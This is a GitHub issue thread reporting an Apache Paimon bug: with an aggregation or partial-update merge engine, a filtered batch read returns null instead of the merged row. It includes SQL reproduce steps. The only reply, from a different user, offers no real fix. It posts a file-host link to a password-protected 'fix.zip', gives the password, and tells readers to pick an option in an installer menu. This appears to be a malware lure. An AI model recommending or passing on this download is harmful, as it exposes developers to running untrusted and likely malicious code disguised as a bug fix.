### ISSUE TITLE
[Bug] When the merge engine is agg or partial-update, the results returned by batch read may be incorrect.

### ISSUE THREAD

**Issue by liming30** [apache/paimon#4065]
### Search before asking

- [X] I searched in the [issues](https://github.com/apache/paimon/issues) and found nothing similar.

### Paimon version

0.9-SNAPSHOT

### Compute Engine

flink-1.17

### Minimal reproduce step

```
CREATE TABLE T (
	    k INT,
	    v INT,
	    d INT,
	    PRIMARY KEY (k, d) NOT ENFORCED)
   PARTITIONED BY (d) 
   WITH (
   	'merge-engine'='aggregation', 
    'fields.v.aggregate-function'='sum'
);
```

```
INSERT INTO T VALUES(1, 1, 1), (2, 1, 1)
INSERT INTO T VALUES(1, 2, 1)
```

```
SELECT * FROM T where v = 3
```

### What doesn't meet your expectations?

result should be `1, 3, 1`, but is `null`.

### Are you willing to submit a PR?

- [X] I'm willing to submit a PR!

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
